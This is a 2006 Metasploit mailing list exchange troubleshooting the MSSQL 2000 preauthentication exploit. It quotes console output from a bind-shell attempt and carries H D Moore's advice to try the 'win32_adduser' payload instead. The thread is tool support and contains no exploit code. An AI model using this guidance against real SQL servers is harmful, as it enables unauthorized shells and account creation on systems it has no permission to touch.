Metasploit mailing list archives
Exploit MSSQL HELO vuln
From: hdm at metasploit.com (H D Moore)
Date: Wed, 5 Apr 2006 02:19:10 -0500
Interesting, it looks like the payload is unable to execute 'cmd.exe', so the payload connects, but immediately exits. Can you try using the "win32_adduser" payload and see if a new user has been created? It also calls "cmd.exe", so it could be a permission issue or some piece of third-party software blocking the execution.

-HD

On Tuesday 04 April 2006 22:11, Josh L. Perrymon wrote:
msf mssql2000_preauthentication(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Saying hello to Microsoft SQL Server 2000 / MSDE 2000 (0x42b68aba / 0x42d01e50)
[*] Got connection from 127.0.0.1:2109 <-> 127.0.0.1:33334
[*] Exiting Bind Handler.
msf mssql2000_preauthentication(win32_bind) >
--------------------------

Does this mean the remote machine has a connection to my local machine? When I try telnetting to 127.0.0.1:33334 it has a blinking cursor then drops the connection????

I haven't used the bind_shell payload before because I usually have the ability to put myself outside the firewall when attempting exploits.

Thanks for the help...

JP